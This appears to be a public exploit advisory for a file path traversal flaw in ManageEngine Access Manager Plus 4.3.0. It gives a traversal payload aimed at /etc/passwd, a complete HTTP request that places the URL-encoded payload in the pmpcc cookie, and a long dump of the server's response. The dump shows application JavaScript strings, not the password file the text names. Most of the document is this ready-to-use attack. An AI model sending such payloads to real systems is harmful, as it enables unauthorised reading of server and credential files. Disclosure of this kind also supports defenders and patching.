## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
## Author: nu11secur1ty
## Date: 11.22.2023
## Vendor: https://www.manageengine.com/
## Software: https://www.manageengine.com/privileged-session-management/download.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)
## Description:
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling
read access to arbitrary files on the server.
The testing payload
..././..././..././..././..././..././..././..././..././..././etc/passwd
was submitted in the pmpcc cookie.
The requested file was returned in the application's response.
The attacker easy can see all the JS structures of the server and can
perform very dangerous actions.
## STATUS: HIGH Vulnerability
[+] Exploits:
```GET
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;
_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;
JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;
JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```
[+] Response:
```
,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is
e-mailed to the user who raises the request, the user who closes the
request and also to those e-mail ids specified at the time of closing
the request.'
,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'
,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next
synchronization is scheduled to run on'
,'js.agent.csharp_Windows_Agent':'C# Windows Agent'
,'js.PassTrixMainTab.in_sec':'Seconds'
,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or
paste the CSR content.'
,'js.connection.colors':'Colors'
,'js.general.ShareToGroups':'Share resource to user groups'
,'js.connection.mapdisk':'Drives'
,'jsp.admin.Support.User_Forums':'User Forums'
,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For
cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a
URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'
,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly
integrate and perfectly fit into the pre-designed and automated
integrations of the below listed RPA-powered platforms, to simulate
the routine manual password retrieval from the PAM360 vault.'
,'js.discovery.loadhostnamefromfile':'From file'
,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please
enter a valid Implementation Class'
,'js.general.GroupedResources':'Grouped Resources'
,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'
,'PROCESSID':'Process Id'
,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services
fetched successfully'
,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'
,'js.commonstr.search':'Search'
,'js.discovery.usercredential_type':'Credential Type'
,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check
high availability status every <input type=\"text\" class=\"txtbox\"
name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"
style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"
> minutes.'
,'pki.js.help.entervalidnumber':'Please enter a valid number for
Numeric Field Default Value.'
,'js.remoteapp.fetch':'Fetch'
,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'
,'js.generalSettings_searchTerm_Password_reset':'Password Reset,
Reason for password reset, disable ticket id, waiting time, wait time
for service account password reset, linux unix password reset'
,'letsencrypt.enter.domainnames':'Enter domain names'
,'js.discovery.resourcetype':'Resource Type'
,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''
,'js.report.timeline.todate':'Valid To'
,'js.general_Language_Changed_Successfully':'Language Changed Successfully'
,'js.aws.credentials.label':'AWS Credential'
,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable
purging of audit trails.'
,'js.general.user.orgn_bulkManage':'Manage Organization'
,'js.rolename.SSH_KEY':'Create\/Add key'
,'js.admin.admin.singledbmultiserver.name':'Application Scaling'
,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'
,'js.settings.breach_settings.disable_api':'Disable API Access'
,'js.cmd.delete.not_possible':'Command cannot be deleted as it is
already added to the following command set(s).'
,'js.settings.notification.domaincontent':'Notify if domains are
expiring within'
,'js.aws.searchuser':'--Search UserName--'
,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing
system settings in Admin >> General >> Ticketing System Integration.'
,'js.discovery.port':'Gateway Port'
,'usermanagement.showCertificates':'Show Certificates'
,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory
cannot be empty'
,'js.sshreport.title':'SSH Resource Report'
,'js.encryptionkey.update':'Update'
,'js.aws.regions':'Region'
,'js.settingsTitle1.UserManagement':'User Management'
,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'
,'js.commonstr.selectResources':'Select Resources'
,'RULENAME':'Rule Name'
,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User
Group added successfully'
,'js.reports.SSHReports.title':'SSH Reports'
,'js.CommonStr.ValueIsLess':'value is less than 2'
,'js.discovery.discoverystatus':'Discovery Status'
,'js.settings.security_settings.Web_Access':'Web Access'
,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'
,'js.deploy.audit':'Deploy Audit'
,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'
,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate
user group(s) to exempt from access control.'
,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'
,'js.admin.HighAvailability.High_Availability_status':'Status'
,'settings.metracker.note0':'Disable ME Tracker if you do not wish to
allow ManageEngine to collect product usage details.'
,'SERVICENAME':'Service Name'
,'settings.metracker.note1':'Access Manager Plus server has to be
restarted for the changes to take effect.'
,'js.general.NewPinMismatch':'New PIN Mismatch'
,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''
,'java.ScheduleUtil.minutes':'minutes'
,'js.admin.sdpop_change.tooltip':'Enabling this option will require
your users to provide valid Change IDs for the validation of password
access requests and other similar operations. Leaving this option
unchecked requires the users to submit valid Request IDs for
validation.'
,'js.privacy_settings.title.redact':'Redact'
,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25
resources can be selected'
,'js.aboutpage.websitetitle':'Website'
,'js.customize.NumericField':'Numeric Field'
,'js.please.select.file':'Please select a file to upload.'
,'js.AutoLogon.Remote_connections':'Remote Connections'
,'pki.snmp.port':'Port'
,'java.dashboardutils.TODAY':'TODAY'
,'js.schedule.starttime':'Start Time'
,'js.ssh.keypassphrase':'Passphrase'
,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'
,'js.analytics.tab.ueba.msg4':'guide'
,'js.analytics.tab.ueba.msg5':'to complete the integration. For any
further questions, please write to us at
[email protected]'
,'js.reportType.Option7.UserAuditReport':'Audit Report'
,'js.common.csr':'CSR'
,'js.globalsign.reissue.order':'Reissue Order'
,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior
for individual users and entities by mapping different user accounts'
,'js.analytics.tab.ueba.msg7':'Verify actionable reports that
symbolize compromise with details about actual behavior and expected
behavior.'
,'js.resources.importcredential':'Import Credentials'
,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for
PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from
different sources, including firewalls, routers, workstations,
databases, file servers and cloud services. Any deviation from normal
behavior is classified as a time, count, or pattern anomaly. It then
gives actionable insight to the IT Administrator with the use of risk
scores, anomaly trends, and intuitive reports.'
,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'
,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360
instance, download Log360 UEBA from the below link and follow the
instructions in this'
,'js.settingsTitle2.MailServer':'Mail Server'
,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing
AMP Encryption Key'
,'settings.unmappedmails.email':'E-mail Address'
,'amp.connection.connection_type':'Connection Type'
,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based
on activity time, count, and pattern.'
,'godaddy.contactphone':'Contact Phone'
,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already
implemented. Implement with some other class.'
,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in
Windows devices, SQL servers, FTP servers, and network devices such as
routers, firewalls, and switches.'
,'js.rolename.freeCA.acme':'ACME'
,'digicert.label.dcv.cname':'CNAME Token'
,'js.helpcontent.createuser':'User Creation '
,'pgpkeys.key.details':'Key Information'
,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'
,'js.HomeTab.TaskAuditView':'Task Audit'
,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups
Shared With User Group(s)'
,'js.common.importcsr.format':'(File format should be .csr)'
,'js.notificationpolicy.Submit':'Save'
,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'
...
...
...
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))
## Reference:
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)
## Proof and Exploit:
[href](https://streamable.com/scdzsb)
## Time spent
`03:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit Data Base https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>